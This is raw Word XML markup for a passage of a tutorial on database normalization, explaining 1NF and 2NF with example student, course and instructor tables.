          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure that each column contains only one value per row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1F66E"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21B7B381" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-1NF Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">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3"/>
        <w:gridCol w:w="585"/>
        <w:gridCol w:w="1306"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0E423697" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F6E11AA"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StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA86A44"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4401A5CB"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Courses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="16193929" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D34EA2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120826A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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DBF7C8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 Science</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="67E3A8C2" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60B2A5DF"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40923CE5"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4536F1B6"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 History</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23CE0BEC" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this table, the Courses column contains multiple values, which violates 1NF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC105C" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1NF Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">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3"/>
        <w:gridCol w:w="585"/>
        <w:gridCol w:w="700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="7854F385" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFC7909"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StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29BBF90E"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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4E5D10"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="577131DA" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E0F24CF"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5603FDD4"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="722D85C1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0E8ADDC7" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C925209"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0461F4F2"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CFE9AF1"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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="1EC1BAA6" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="006AE70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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="202E835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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33715B20"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="4149ECE8" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0922303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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA13949"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671F92A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History</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C124AC2" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, each row contains only a single value for Course, and the table is in 1NF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAE371"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2. Second Normal Form (2NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268466A1"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Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table is in 2NF if it is in 1NF and all non-key attributes are fully functionally dependent on the entire primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061FCA4"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A25E45E" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure that each non-key attribute is fully dependent on the whole primary key, not just part of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB693E2"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954259B" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-2NF Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">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3"/>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="5E9D28FE" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C33A9B7"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StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55029571"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F2BE039"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3145D22F"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InstructorPhone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="58D19607" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E3A82E5"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35BC773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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A373628"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53254B96"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123-456-7890</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="55019938" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B7570E4"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6378DFA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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F29CBA3"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7175F33F"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987-654-3210</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="4BD37036" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="395FD163"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BF086DA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45722266"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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="469E8EA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555-666-7777</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0984B5C4" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The Instructor and InstructorPhone depend on the Course, not the StudentID alone. This table is not in 2NF because it has partial dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433DD421" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2NF Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFCB1C" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Student-Course Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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13"/>
        <w:gridCol w:w="700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="2A7E2DF8" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311FB1D6"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StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F62F38"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="69B34A37" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B6468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7CBC9529"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="79FE3105" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E3317C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29248B3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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0087FF00" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AB7DCF"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="790644B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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C4E4BAF" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Course-Instructor Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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00"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1564"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="39368C54" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62BA6A9D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2498FFF3"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9FCADF"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InstructorPhone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="60ED4BEB" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB238A5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C3412BE"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54BFE62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123-456-7890</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="05EC2201" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A8669D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61970D0F"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADCDBE0"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987-654-3210</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="383F0FF1" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EE13D21"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31F300BE"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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
